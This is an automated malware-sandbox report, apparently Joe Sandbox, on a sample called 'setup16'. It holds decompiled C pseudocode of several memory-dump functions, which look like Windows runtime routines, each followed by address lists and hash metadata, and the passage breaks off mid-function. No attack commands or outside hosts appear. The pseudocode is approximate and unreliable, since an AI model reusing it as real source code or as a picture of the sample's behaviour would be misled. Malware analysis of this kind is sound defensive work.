                                                                                                                                                                                                        			E049FB390(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed char _t12;
				signed int _t16;
				signed int _t21;
				void* _t28;
				signed int _t30;
				signed int _t36;
				signed int _t41;

				_push(__ecx);
				_t41 = _a4 + 0xffffffb8;
				E049E2280(_t12, 0x4ab8608);
				 *(_t41 + 0x34) =  *(_t41 + 0x34) - 1;
				asm("sbb edi, edi");
				_t36 =  !( ~( *(_t41 + 0x34))) & _t41;
				_v8 = _t36;
				asm("lock cmpxchg [ebx], ecx");
				_t30 = 1;
				if(1 != 1) {
					while(1) {
						_t21 = _t30 & 0x00000006;
						_t16 = _t30;
						_t28 = (0 | _t21 == 0x00000002) * 4 - 1 + _t30;
						asm("lock cmpxchg [edi], esi");
						if(_t16 == _t30) {
							break;
						}
						_t30 = _t16;
					}
					_t36 = _v8;
					if(_t21 == 2) {
						_t16 = E04A000C2(0x4ab8608, 0, _t28);
					}
				}
				if(_t36 != 0) {
					_t16 = L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t36);
				}
				return _t16;
			}











                                                                                                                                                                                                        0x049fb395
                                                                                                                                                                                                        0x049fb3a2
                                                                                                                                                                                                        0x049fb3a5
                                                                                                                                                                                                        0x049fb3aa
                                                                                                                                                                                                        0x049fb3b2
                                                                                                                                                                                                        0x049fb3ba
                                                                                                                                                                                                        0x049fb3bd
                                                                                                                                                                                                        0x049fb3c0
                                                                                                                                                                                                        0x049fb3c4
                                                                                                                                                                                                        0x049fb3c9
                                                                                                                                                                                                        0x04a3a3e9
                                                                                                                                                                                                        0x04a3a3ed
                                                                                                                                                                                                        0x04a3a3f0
                                                                                                                                                                                                        0x04a3a3ff
                                                                                                                                                                                                        0x04a3a403
                                                                                                                                                                                                        0x04a3a409
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3a40b
                                                                                                                                                                                                        0x04a3a40b
                                                                                                                                                                                                        0x04a3a40f
                                                                                                                                                                                                        0x04a3a415
                                                                                                                                                                                                        0x04a3a423
                                                                                                                                                                                                        0x04a3a423
                                                                                                                                                                                                        0x04a3a415
                                                                                                                                                                                                        0x049fb3d1
                                                                                                                                                                                                        0x049fb3e8
                                                                                                                                                                                                        0x049fb3e8
                                                                                                                                                                                                        0x049fb3d9

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 6fe56ebba3a7cfb7c469af56bdef898f263c31d8bf1976d7197a1b36b024b955
                                                                                                                                                                                                        • Instruction ID: 4c33c64a75c90ae98a6af4b9ef786f2973371e063506993e90cedfc27db0a3cf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6fe56ebba3a7cfb7c469af56bdef898f263c31d8bf1976d7197a1b36b024b955
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EC1188333021209BDB199E19DD80A6BB29FEBC5330B24053DEA5687380E931BC02C3C0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A54257 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 90%
                                                                                                                                                                                                        			E04A54257(void* __ebx, void* __ecx, intOrPtr* __edi, void* __esi, void* __eflags) {
				intOrPtr* _t18;
				intOrPtr _t24;
				intOrPtr* _t27;
				intOrPtr* _t30;
				intOrPtr* _t31;
				intOrPtr _t33;
				intOrPtr* _t34;
				intOrPtr* _t35;
				void* _t37;
				void* _t38;
				void* _t39;
				void* _t43;

				_t39 = __eflags;
				_t35 = __edi;
				_push(8);
				_push(0x4aa08d0);
				E04A1D08C(__ebx, __edi, __esi);
				_t37 = __ecx;
				E04A541E8(__ebx, __edi, __ecx, _t39);
				E049DEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
				 *(_t38 - 4) =  *(_t38 - 4) & 0x00000000;
				_t18 = _t37 + 8;
				_t33 =  *_t18;
				_t27 =  *((intOrPtr*)(_t18 + 4));
				if( *((intOrPtr*)(_t33 + 4)) != _t18 ||  *_t27 != _t18) {
					L8:
					_push(3);
					asm("int 0x29");
				} else {
					 *_t27 = _t33;
					 *((intOrPtr*)(_t33 + 4)) = _t27;
					_t35 = 0x4ab87e4;
					_t18 =  *0x4ab87e0; // 0x0
					while(_t18 != 0) {
						_t43 = _t18 -  *0x4ab5cd0; // 0xffffffff
						if(_t43 >= 0) {
							_t31 =  *0x4ab87e4; // 0x0
							_t18 =  *_t31;
							if( *((intOrPtr*)(_t31 + 4)) != _t35 ||  *((intOrPtr*)(_t18 + 4)) != _t31) {
								goto L8;
							} else {
								 *0x4ab87e4 = _t18;
								 *((intOrPtr*)(_t18 + 4)) = _t35;
								L049C7055(_t31 + 0xfffffff8);
								_t24 =  *0x4ab87e0; // 0x0
								_t18 = _t24 - 1;
								 *0x4ab87e0 = _t18;
								continue;
							}
						}
						goto L9;
					}
				}
				L9:
				__eflags =  *0x4ab5cd0;
				if( *0x4ab5cd0 <= 0) {
					L049C7055(_t37);
				} else {
					_t30 = _t37 + 8;
					_t34 =  *0x4ab87e8; // 0x0
					__eflags =  *_t34 - _t35;
					if( *_t34 != _t35) {
						goto L8;
					} else {
						 *_t30 = _t35;
						 *((intOrPtr*)(_t30 + 4)) = _t34;
						 *_t34 = _t30;
						 *0x4ab87e8 = _t30;
						 *0x4ab87e0 = _t18 + 1;
					}
				}
				 *(_t38 - 4) = 0xfffffffe;
				return E04A1D0D1(L04A54320());
			}















                                                                                                                                                                                                        0x04a54257
                                                                                                                                                                                                        0x04a54257
                                                                                                                                                                                                        0x04a54257
                                                                                                                                                                                                        0x04a54259
                                                                                                                                                                                                        0x04a5425e
                                                                                                                                                                                                        0x04a54263
                                                                                                                                                                                                        0x04a54265
                                                                                                                                                                                                        0x04a54273
                                                                                                                                                                                                        0x04a54278
                                                                                                                                                                                                        0x04a5427c
                                                                                                                                                                                                        0x04a5427f
                                                                                                                                                                                                        0x04a54281
                                                                                                                                                                                                        0x04a54287
                                                                                                                                                                                                        0x04a542d7
                                                                                                                                                                                                        0x04a542d7
                                                                                                                                                                                                        0x04a542da
                                                                                                                                                                                                        0x04a5428d
                                                                                                                                                                                                        0x04a5428d
                                                                                                                                                                                                        0x04a5428f
                                                                                                                                                                                                        0x04a54292
                                                                                                                                                                                                        0x04a54297
                                                                                                                                                                                                        0x04a5429c
                                                                                                                                                                                                        0x04a542a0
                                                                                                                                                                                                        0x04a542a6
                                                                                                                                                                                                        0x04a542a8
                                                                                                                                                                                                        0x04a542ae
                                                                                                                                                                                                        0x04a542b3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a542ba
                                                                                                                                                                                                        0x04a542ba
                                                                                                                                                                                                        0x04a542bf
                                                                                                                                                                                                        0x04a542c5
                                                                                                                                                                                                        0x04a542ca
                                                                                                                                                                                                        0x04a542cf
                                                                                                                                                                                                        0x04a542d0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a542d0
                                                                                                                                                                                                        0x04a542b3
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a542a6
                                                                                                                                                                                                        0x04a5429c
                                                                                                                                                                                                        0x04a542dc
                                                                                                                                                                                                        0x04a542dc
                                                                                                                                                                                                        0x04a542e3
                                                                                                                                                                                                        0x04a54309
                                                                                                                                                                                                        0x04a542e5
                                                                                                                                                                                                        0x04a542e5
                                                                                                                                                                                                        0x04a542e8
                                                                                                                                                                                                        0x04a542ee
                                                                                                                                                                                                        0x04a542f0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a542f2
                                                                                                                                                                                                        0x04a542f2
                                                                                                                                                                                                        0x04a542f4
                                                                                                                                                                                                        0x04a542f7
                                                                                                                                                                                                        0x04a542f9
                                                                                                                                                                                                        0x04a54300
                                                                                                                                                                                                        0x04a54300
                                                                                                                                                                                                        0x04a542f0
                                                                                                                                                                                                        0x04a5430e
                                                                                                                                                                                                        0x04a5431f

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: c86bf8961f8486e81af12423e12f9bead0f9915f27a2301d9a33e13257d926b3
                                                                                                                                                                                                        • Instruction ID: dae1dce080bf71ee29f41fe632bcb244b973486db2d75334b313c7e692dd9f77
                                                                                                                                                                                                        • Opcode Fuzzy Hash: c86bf8961f8486e81af12423e12f9bead0f9915f27a2301d9a33e13257d926b3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CE211DB0501B11DFD715EF59E2006587BF9FB99319F1081AEC9198F271D739A8D2CB81
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A446A7 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E04A446A7(signed short* __ecx, unsigned int __edx, char* _a4) {
				signed short* _v8;
				unsigned int _v12;
				intOrPtr _v16;
				signed int _t22;
				signed char _t23;
				short _t32;
				void* _t38;
				char* _t40;

				_v12 = __edx;
				_t29 = 0;
				_v8 = __ecx;
				_v16 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t38 = L049E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *__ecx & 0x0000ffff);
				if(_t38 != 0) {
					_t40 = _a4;
					 *_t40 = 1;
					E04A0F3E0(_t38, _v8[2],  *_v8 & 0x0000ffff);
					_t22 = _v12 >> 1;
					_t32 = 0x2e;
					 *((short*)(_t38 + _t22 * 2)) = _t32;
					 *((short*)(_t38 + 2 + _t22 * 2)) = 0;
					_t23 = E049FD268(_t38, 1);
					asm("sbb al, al");
					 *_t40 =  ~_t23 + 1;
					L049E77F0(_v16, 0, _t38);
				} else {
					 *_a4 = 0;
					_t29 = 0xc0000017;
				}
				return _t29;
			}











                                                                                                                                                                                                        0x04a446b7
                                                                                                                                                                                                        0x04a446ba
                                                                                                                                                                                                        0x04a446c5
                                                                                                                                                                                                        0x04a446c8
                                                                                                                                                                                                        0x04a446d0
                                                                                                                                                                                                        0x04a446d4
                                                                                                                                                                                                        0x04a446e6
                                                                                                                                                                                                        0x04a446e9
                                                                                                                                                                                                        0x04a446f4
                                                                                                                                                                                                        0x04a446ff
                                                                                                                                                                                                        0x04a44705
                                                                                                                                                                                                        0x04a44706
                                                                                                                                                                                                        0x04a4470c
                                                                                                                                                                                                        0x04a44713
                                                                                                                                                                                                        0x04a4471b
                                                                                                                                                                                                        0x04a44723
                                                                                                                                                                                                        0x04a44725
                                                                                                                                                                                                        0x04a446d6
                                                                                                                                                                                                        0x04a446d9
                                                                                                                                                                                                        0x04a446db
                                                                                                                                                                                                        0x04a446db
                                                                                                                                                                                                        0x04a44732

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                                                                                                        • Instruction ID: d7b2f0052ce27b27298315a55261106ee0e773c0a45f5d3ed76cc435a9716cb8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c02f93804e98639f40e64f25065eaa58b5c60d6a79ebe6421c16f95bf281ade
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E1110272504208BBDB059F5DA8809BEB7B9EFC9304F1080AAF94487350DA319D51D7A5
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F2397 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 34%
                                                                                                                                                                                                        			E049F2397(intOrPtr _a4) {
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t11;
				void* _t19;
				void* _t25;
				void* _t26;
				intOrPtr _t27;
				void* _t28;
				void* _t29;

				_t27 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				if( *0x4ab848c != 0) {
					L049EFAD0(0x4ab8610);
					if( *0x4ab848c == 0) {
						E049EFA00(0x4ab8610, _t19, _t27, 0x4ab8610);
						goto L1;
					} else {
						_push(0);
						_push(_a4);
						_t26 = 4;
						_t29 = E049F2581(0x4ab8610, 0x49a50a0, _t26, _t27, _t28);
						E049EFA00(0x4ab8610, 0x49a50a0, _t27, 0x4ab8610);
					}
				} else {
					L1:
					_t11 =  *0x4ab8614; // 0x1
					if(_t11 == 0) {
						_t11 = E04A04886(0x49a1088, 1, 0x4ab8614);
					}
					_push(0);
					_push(_a4);
					_t25 = 4;
					_t29 = E049F2581(0x4ab8610, (_t11 << 4) + 0x49a5070, _t25, _t27, _t28);
				}
				if(_t29 != 0) {
					 *((intOrPtr*)(_t29 + 0x38)) = _t27;
					 *((char*)(_t29 + 0x40)) = 0;
				}
				return _t29;
			}















                                                                                                                                                                                                        0x049f23b0
                                                                                                                                                                                                        0x049f23b6
                                                                                                                                                                                                        0x049f2409
                                                                                                                                                                                                        0x049f2415
                                                                                                                                                                                                        0x04a35ae9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f241b
                                                                                                                                                                                                        0x049f241b
                                                                                                                                                                                                        0x049f241d
                                                                                                                                                                                                        0x049f2427
                                                                                                                                                                                                        0x049f242e
                                                                                                                                                                                                        0x049f2430
                                                                                                                                                                                                        0x049f2430
                                                                                                                                                                                                        0x049f23b8
                                                                                                                                                                                                        0x049f23b8
                                                                                                                                                                                                        0x049f23b8
                                                                                                                                                                                                        0x049f23bf
                                                                                                                                                                                                        0x049f23fc
                                                                                                                                                                                                        0x049f23fc
                                                                                                                                                                                                        0x049f23c1
                                                                                                                                                                                                        0x049f23c3
                                                                                                                                                                                                        0x049f23d0
                                                                                                                                                                                                        0x049f23d8
                                                                                                                                                                                                        0x049f23d8
                                                                                                                                                                                                        0x049f23dc
                                                                                                                                                                                                        0x049f23de
                                                                                                                                                                                                        0x049f23e1
                                                                                                                                                                                                        0x049f23e1
                                                                                                                                                                                                        0x049f23ec

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 4c381a11cdd7f3926e329e77b4e254f1b5cf978454973ec645cf61eb84c33e18
                                                                                                                                                                                                        • Instruction ID: f52c670c11eb5b81dea870e4a4ffd61b8f47c5255269b967a9a8e96254b12100
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4c381a11cdd7f3926e329e77b4e254f1b5cf978454973ec645cf61eb84c33e18
                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED11087270031077F720BB2E9C50B26B6CDEB90B24F14487AF706AB191E5B9F8059795
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049CC962 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 42%
                                                                                                                                                                                                        			E049CC962(char __ecx) {
				signed int _v8;
				intOrPtr _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t19;
				char _t22;
				void* _t26;
				void* _t27;
				char _t32;
				char _t34;
				void* _t35;
				void* _t37;
				intOrPtr* _t38;
				signed int _t39;

				_t41 = (_t39 & 0xfffffff8) - 0xc;
				_v8 =  *0x4abd360 ^ (_t39 & 0xfffffff8) - 0x0000000c;
				_t34 = __ecx;
				if(( *( *[fs:0x30] + 0x68) & 0x00000100) != 0) {
					_t26 = 0;
					E049DEEF0(0x4ab70a0);
					_t29 =  *((intOrPtr*)(_t34 + 0x18));
					if(E04A4F625( *((intOrPtr*)(_t34 + 0x18))) != 0) {
						L9:
						E049DEB70(_t29, 0x4ab70a0);
						_t19 = _t26;
						L2:
						_pop(_t35);
						_pop(_t37);
						_pop(_t27);
						return E04A0B640(_t19, _t27, _v8 ^ _t41, _t32, _t35, _t37);
					}
					_t29 = _t34;
					_t26 = E04A4F1FC(_t34, _t32);
					if(_t26 < 0) {
						goto L9;
					}
					_t38 =  *0x4ab70c0; // 0x0
					while(_t38 != 0x4ab70c0) {
						_t22 =  *((intOrPtr*)(_t38 + 0x18));
						_t38 =  *_t38;
						_v12 = _t22;
						if(_t22 != 0) {
							_t29 = _t22;
							 *0x4abb1e0( *((intOrPtr*)(_t34 + 0x30)),  *((intOrPtr*)(_t34 + 0x18)),  *((intOrPtr*)(_t34 + 0x20)), _t34);
							_v12();
						}
					}
					goto L9;
				}
				_t19 = 0;
				goto L2;
			}


















                                                                                                                                                                                                        0x049cc96a
                                                                                                                                                                                                        0x049cc974
                                                                                                                                                                                                        0x049cc988
                                                                                                                                                                                                        0x049cc98a
                                                                                                                                                                                                        0x04a37c9d
                                                                                                                                                                                                        0x04a37c9f
                                                                                                                                                                                                        0x04a37ca4
                                                                                                                                                                                                        0x04a37cae
                                                                                                                                                                                                        0x04a37cf0
                                                                                                                                                                                                        0x04a37cf5
                                                                                                                                                                                                        0x04a37cfa
                                                                                                                                                                                                        0x049cc992
                                                                                                                                                                                                        0x049cc996
                                                                                                                                                                                                        0x049cc997
                                                                                                                                                                                                        0x049cc998
                                                                                                                                                                                                        0x049cc9a3
                                                                                                                                                                                                        0x049cc9a3
                                                                                                                                                                                                        0x04a37cb0
                                                                                                                                                                                                        0x04a37cb7
                                                                                                                                                                                                        0x04a37cbb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37cbd
                                                                                                                                                                                                        0x04a37ce8
                                                                                                                                                                                                        0x04a37cc5
                                                                                                                                                                                                        0x04a37cc8
                                                                                                                                                                                                        0x04a37cca
                                                                                                                                                                                                        0x04a37cd0
                                                                                                                                                                                                        0x04a37cd6
                                                                                                                                                                                                        0x04a37cde
                                                                                                                                                                                                        0x04a37ce4
                                                                                                                                                                                                        0x04a37ce4
                                                                                                                                                                                                        0x04a37cd0
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a37ce8
                                                                                                                                                                                                        0x049cc990
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 6e149dde586fa56b1810919077b910207f510df7680ae5e1ebacd6ab3a1b3cb4
                                                                                                                                                                                                        • Instruction ID: 86d148cc2c73ad2f7c6b6563cbce30ea4fa741ac7d594a59850ab52cba83c9b7
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6e149dde586fa56b1810919077b910207f510df7680ae5e1ebacd6ab3a1b3cb4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 43112135300A469FDB10AF68DC84A6BB7E5FBC4A19F00453AF88583662EB60FC00DBD1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A037F5 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                                        			E04A037F5(void* __ecx, intOrPtr* __edx) {
				void* __ebx;
				void* __edi;
				signed char _t6;
				intOrPtr _t13;
				intOrPtr* _t20;
				intOrPtr* _t27;
				void* _t28;
				intOrPtr* _t29;

				_t27 = __edx;
				_t28 = __ecx;
				if(__edx == 0) {
					E049E2280(_t6, 0x4ab8550);
				}
				_t29 = E04A0387E(_t28);
				if(_t29 == 0) {
					L6:
					if(_t27 == 0) {
						E049DFFB0(0x4ab8550, _t27, 0x4ab8550);
					}
					if(_t29 == 0) {
						return 0xc0000225;
					} else {
						if(_t27 != 0) {
							goto L14;
						}
						L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27, _t29);
						goto L11;
					}
				} else {
					_t13 =  *_t29;
					if( *((intOrPtr*)(_t13 + 4)) != _t29) {
						L13:
						_push(3);
						asm("int 0x29");
						L14:
						 *_t27 = _t29;
						L11:
						return 0;
					}
					_t20 =  *((intOrPtr*)(_t29 + 4));
					if( *_t20 != _t29) {
						goto L13;
					}
					 *_t20 = _t13;
					 *((intOrPtr*)(_t13 + 4)) = _t20;
					asm("btr eax, ecx");
					goto L6;
				}
			}











                                                                                                                                                                                                        0x04a037fa
                                                                                                                                                                                                        0x04a037fc
                                                                                                                                                                                                        0x04a03805
                                                                                                                                                                                                        0x04a03808
                                                                                                                                                                                                        0x04a03808
                                                                                                                                                                                                        0x04a03814
                                                                                                                                                                                                        0x04a03818
                                                                                                                                                                                                        0x04a03846
                                                                                                                                                                                                        0x04a03848
                                                                                                                                                                                                        0x04a0384b
                                                                                                                                                                                                        0x04a0384b
                                                                                                                                                                                                        0x04a03852
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a03854
                                                                                                                                                                                                        0x04a03856
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a03863
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a03863
                                                                                                                                                                                                        0x04a0381a
                                                                                                                                                                                                        0x04a0381a
                                                                                                                                                                                                        0x04a0381f
                                                                                                                                                                                                        0x04a0386e
                                                                                                                                                                                                        0x04a0386e
                                                                                                                                                                                                        0x04a03871
                                                                                                                                                                                                        0x04a03873
                                                                                                                                                                                                        0x04a03873
                                                                                                                                                                                                        0x04a03868
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a03868
                                                                                                                                                                                                        0x04a03821
                                                                                                                                                                                                        0x04a03826
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a03828
                                                                                                                                                                                                        0x04a0382a
                                                                                                                                                                                                        0x04a03841
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a03841

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 71be3a435f0a9bd4eb0ae7fba727f19e83c32aa45aea3d305422e0ef2eb9f422
                                                                                                                                                                                                        • Instruction ID: ecd4891646cb99c9fc452fd429d7d9c503a916c04c748307624801003e4102ef
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 71be3a435f0a9bd4eb0ae7fba727f19e83c32aa45aea3d305422e0ef2eb9f422
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F501C472A016109BDB3B8B5AA940A26BBAADFC5B50B15C0E9EC458B291D730E805C7D0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049F002D Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E049F002D() {
				void* _t11;
				char* _t14;
				signed char* _t16;
				char* _t27;
				signed char* _t29;

				_t11 = E049E7D50();
				_t27 = 0x7ffe0384;
				if(_t11 != 0) {
					_t14 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t14 = 0x7ffe0384;
				}
				_t29 = 0x7ffe0385;
				if( *_t14 != 0) {
					if(E049E7D50() == 0) {
						_t16 = 0x7ffe0385;
					} else {
						_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t16 & 0x00000040) != 0) {
						goto L18;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(E049E7D50() != 0) {
						_t27 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					if( *_t27 != 0) {
						if(( *( *[fs:0x30] + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						if(E049E7D50() != 0) {
							_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t29 & 0x00000020) == 0) {
							goto L5;
						}
						L18:
						return 1;
					} else {
						L5:
						return 0;
					}
				}
			}








                                                                                                                                                                                                        0x049f0032
                                                                                                                                                                                                        0x049f0037
                                                                                                                                                                                                        0x049f0043
                                                                                                                                                                                                        0x04a34b3a
                                                                                                                                                                                                        0x049f0049
                                                                                                                                                                                                        0x049f0049
                                                                                                                                                                                                        0x049f0049
                                                                                                                                                                                                        0x049f004e
                                                                                                                                                                                                        0x049f0053
                                                                                                                                                                                                        0x04a34b48
                                                                                                                                                                                                        0x04a34b5a
                                                                                                                                                                                                        0x04a34b4a
                                                                                                                                                                                                        0x04a34b53
                                                                                                                                                                                                        0x04a34b53
                                                                                                                                                                                                        0x04a34b5f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34b61
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34b61
                                                                                                                                                                                                        0x049f0059
                                                                                                                                                                                                        0x049f0059
                                                                                                                                                                                                        0x049f0060
                                                                                                                                                                                                        0x04a34b6f
                                                                                                                                                                                                        0x04a34b6f
                                                                                                                                                                                                        0x049f0069
                                                                                                                                                                                                        0x04a34b83
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34b90
                                                                                                                                                                                                        0x04a34b9b
                                                                                                                                                                                                        0x04a34b9b
                                                                                                                                                                                                        0x04a34ba4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a34baa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f006f
                                                                                                                                                                                                        0x049f006f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049f006f
                                                                                                                                                                                                        0x049f0069

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                                                                                                                        • Instruction ID: be443c04aeb58fc82b49b9a8c1114cad38a04d36651d54a7a96029d81edc1f7c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d774e958955e2a4888292503cae141afd510c2672050b36ba74763b54e4c63a
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D511A932601680CFE7229F698D44B3537E9AB88759F0900F0EE048B6A2F328F881C361
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049D766D Relevance: .1, Instructions: 54COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E049D766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
